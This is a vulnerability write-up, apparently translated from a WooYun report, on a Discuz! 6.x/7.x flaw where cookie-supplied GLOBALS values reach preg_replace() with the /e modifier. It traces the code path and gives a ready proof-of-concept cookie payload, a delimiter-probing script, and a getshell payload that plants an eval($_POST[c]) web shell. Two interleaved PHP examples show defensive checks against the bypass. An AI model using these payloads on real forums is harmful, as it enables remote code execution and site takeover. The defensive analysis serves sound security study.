Reference: http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080723.html
File: include/discuzcode.func.php, lines 97-241, function discuzcode().
Inside it, $GLOBALS['_DCACHE']['smilies']['searcharray'] and $GLOBALS['_DCACHE']['smilies']['replacearray'] are passed straight to preg_replace() as pattern and replacement:
$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);
In PHP 5.3.*, however, what the superglobal $_REQUEST contains is governed by request_order in php.ini. In the latest 5.3.x releases request_order defaults to "GP", which means that under the default configuration $_REQUEST holds only $_GET and $_POST, not $_COOKIE, so the GLOBALS variable can be submitted through a cookie without appearing in $_REQUEST. (In 5.3.29 the default is "CGP".)
To demonstrate the vulnerability, set request_order to GP.
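To make the request_order point concrete, here is an added example (not code from Discuz or from the original write-up) that rebuilds a $_REQUEST-style array the way PHP does for a given request_order and compares a check that looks only at $_REQUEST with one that inspects every input array directly. It assumes the bypassed defense keys on isset($_REQUEST['GLOBALS']), which the write-up implies but does not quote; the request arrays below are constructed, and the function names are my own.

```php
<?php
// Added example (not Discuz code): how request_order shapes $_REQUEST, and a
// GLOBALS-tainting check that does not depend on it. Runs stand-alone on PHP 7+.

/**
 * Simplified model of how PHP fills $_REQUEST: the sources named in
 * request_order ("G" = $_GET, "P" = $_POST, "C" = $_COOKIE) are merged in
 * that order, later sources overwriting earlier keys. Letters that are not
 * present are left out entirely, which is the whole point of the write-up.
 */
function buildRequest(string $requestOrder, array $get, array $post, array $cookie): array
{
    $sources = ['G' => $get, 'P' => $post, 'C' => $cookie];
    $request = [];
    foreach (str_split(strtoupper($requestOrder)) as $letter) {
        if (isset($sources[$letter])) {
            $request = array_merge($request, $sources[$letter]);
        }
    }
    return $request;
}

/** The kind of check the write-up describes as bypassable: it consults only $_REQUEST. */
function naiveTaintCheck(array $request): bool
{
    return isset($request['GLOBALS']);
}

/** Hardened check: look at every input source directly, whatever request_order says. */
function requestTaintsGlobals(array $get, array $post, array $cookie, array $files): bool
{
    foreach ([$get, $post, $cookie, $files] as $source) {
        if (array_key_exists('GLOBALS', $source)) {
            return true;
        }
    }
    return false;
}

// Constructed request: the GLOBALS payload arrives only in the cookie, the
// query string is an ordinary thread view.
$get    = ['tid' => '13', 'extra' => 'page=1'];
$post   = [];
$cookie = ['GLOBALS' => ['_DCACHE' => ['smilies' => ['searcharray' => ['/.*/eui']]]]];

foreach (['GP', 'CGP'] as $order) {
    $result = naiveTaintCheck(buildRequest($order, $get, $post, $cookie)) ? 'caught' : 'MISSED';
    echo "request_order={$order}: \$_REQUEST-only check {$result}\n";
}

// The direct check does not care which request_order the server runs with.
echo 'direct superglobal check: ', requestTaintsGlobals($get, $post, $cookie, []) ? 'caught' : 'MISSED', "\n";
```

With GP the $_REQUEST-only check never sees the cookie key and reports a miss, with CGP it catches it, while requestTaintsGlobals() flags the request under either setting because it never consults $_REQUEST at all. The same lesson applies to any filter built on $_REQUEST: its contents are an ini-level deployment choice, not a property of the application.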
This preg_replace() call is a textbook vulnerability: both of its first two arguments are attacker-controlled. If the pattern (first argument) carries the /e modifier and the replacement (second argument) is the PHP code to be run, the call becomes a code-execution backdoor.
One point to note: the pattern does not have to be written exactly as /.../e; the delimiter / can be swapped for other characters.
A quick script shows which characters work as the delimiter:
<?php
preg_replace($_GET['a'].'.*'.$_GET['a'].'e', 'phpinfo();', 'a', 1);
?>
Specifically, characters such as #, $, %, ^, &, *, (, ), -, + and others can be used, but pay attention to escaping during transmission.
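Because the delimiter is attacker-chosen, a filter that only looks for a leading "/" or for the literal string "/e" is easy to get around. The following added example (again not Discuz code, and not from the write-up) parses a pattern the way PHP's PCRE wrapper does to locate the real modifier string, then uses that to audit a searcharray/replacearray pair before it reaches preg_replace(). PHP accepts any non-alphanumeric, non-backslash, non-whitespace byte as the opening delimiter, pairs ( [ { < with ) ] } >, and treats a backslash as escaping the next byte; the parser below follows those rules. Function names and the sample patterns are my own.

```php
<?php
// Added example (not Discuz code): find the real PCRE modifier string whatever
// the delimiter, and reject /e before preg_replace() ever sees it. PHP 7+.

/**
 * Return the trailing modifier string of a PCRE pattern, or null if the
 * pattern is malformed. Mirrors PHP's delimiter handling: leading whitespace
 * is skipped; the delimiter may be any byte that is not alphanumeric or a
 * backslash; ( [ { < close with ) ] } > and nest; a backslash escapes the
 * following byte.
 */
function pcreModifiers(string $pattern): ?string
{
    $pattern = ltrim($pattern);
    if ($pattern === '') {
        return null;
    }
    $open  = $pattern[0];
    $alnum = ($open >= '0' && $open <= '9') || ($open >= 'a' && $open <= 'z') || ($open >= 'A' && $open <= 'Z');
    if ($alnum || $open === '\\') {
        return null;
    }
    $pairs = ['(' => ')', '[' => ']', '{' => '}', '<' => '>'];
    $close = $pairs[$open] ?? $open;
    $depth = 1;
    $len   = strlen($pattern);
    for ($i = 1; $i < $len; $i++) {
        $c = $pattern[$i];
        if ($c === '\\' && $i + 1 < $len) {
            $i++;                                   // skip the escaped byte
        } elseif ($c === $close && --$depth === 0) {
            return substr($pattern, $i + 1);        // everything after the closing delimiter
        } elseif ($c === $open && $open !== $close) {
            $depth++;                               // nested bracket-style delimiter
        }
    }
    return null;                                    // closing delimiter never found
}

/** True if the pattern requests code evaluation via the /e modifier (removed in PHP 7.0). */
function patternUsesEval(string $pattern): bool
{
    $mods = pcreModifiers($pattern);
    return $mods !== null && strpos($mods, 'e') !== false;
}

/**
 * Audit a search/replace pair before handing it to preg_replace(). Returns the
 * list of entries that must not be used: non-strings, malformed patterns and
 * anything carrying /e. An empty list means the arrays are acceptable.
 */
function auditSmileyArrays(array $searcharray, array $replacearray): array
{
    $rejected = [];
    if (count($searcharray) !== count($replacearray)) {
        $rejected[] = '(searcharray/replacearray length mismatch)';
    }
    foreach ($searcharray as $pattern) {
        if (!is_string($pattern) || pcreModifiers($pattern) === null || patternUsesEval($pattern)) {
            $rejected[] = is_string($pattern) ? $pattern : gettype($pattern);
        }
    }
    return $rejected;
}

// Constructed samples: the write-up's pattern, the same idea with other
// delimiters, two benign smiley-style patterns, and a string with no delimiter.
$samples = ['/.*/eui', '#.*#e', '(.*)e', '{.*}ei', '/:\)/i', '/\[em(\d+)\]/', 'nodelims'];
foreach ($samples as $p) {
    printf("%-16s modifiers=%-7s eval=%s\n",
        $p, var_export(pcreModifiers($p), true), patternUsesEval($p) ? 'yes' : 'no');
}

$bad = auditSmileyArrays(['/.*/eui'], ['phpinfo();']);
echo $bad ? 'rejected: ' . implode(', ', $bad) . "\n" : "arrays accepted\n";
```

The audit catches /e whether the pattern is delimited with "/", "#", "{...}" or "(...)", and treats a pattern with no closing delimiter as unusable rather than passing it through. On PHP 7.0 and later the /e modifier is gone and preg_replace() fails with a warning instead of executing anything, but the Discuz versions in this write-up ran on PHP 5.x, where this kind of check is exactly what stands between a cache variable and code execution.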
Submit via cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
Then trace back to where the discuzcode() function is called.
The viewthread_procpost() function, lines 619-729 of /viewthread.php.
discuzcode() is called on line 725:
$post['message'] = discuzcode($post['message'], $post['smileyoff'], $post['bbcodeoff'], $post['htmlon'] & 1, $forum['allowsmilies'], $forum['allowbbcode'], ($forum['allowimgcode'] && $showimages ? 1 : 0), $forum['allowhtml'], ($forum['jammer'] && $post['authorid'] != $discuz_uid ? 1 : 0), 0, $post['authorid'], $forum['allowmediacode'], $post['pid']);
Tracing back once more, viewthread_procpost() is called here:
while($post = $sdb->fetch_array($query)) {
	if(($onlyauthoradd && $post['anonymous'] == 0) || !$onlyauthoradd) {
		$postlist[$post['pid']] = viewthread_procpost($post);
	}
}
Back in /include/discuzcode.func.php: once $GLOBALS['_DCACHE']['smilies'] has been set, the condition below passes, preg_replace() runs, and code execution follows.
if(!$smileyoff && $allowsmilies && !empty($GLOBALS['_DCACHE']['smilies']) && is_array($GLOBALS['_DCACHE']['smilies'])) { ... }
POC: add to the cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
Then visit any post, e.g. /viewthread.php?tid=13&extra=page%3D1, to trigger the vulnerability.
Getshell: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval($_POST[c])%3b;
Discuz! 6.x/7.x global variable defense bypass leading to command execution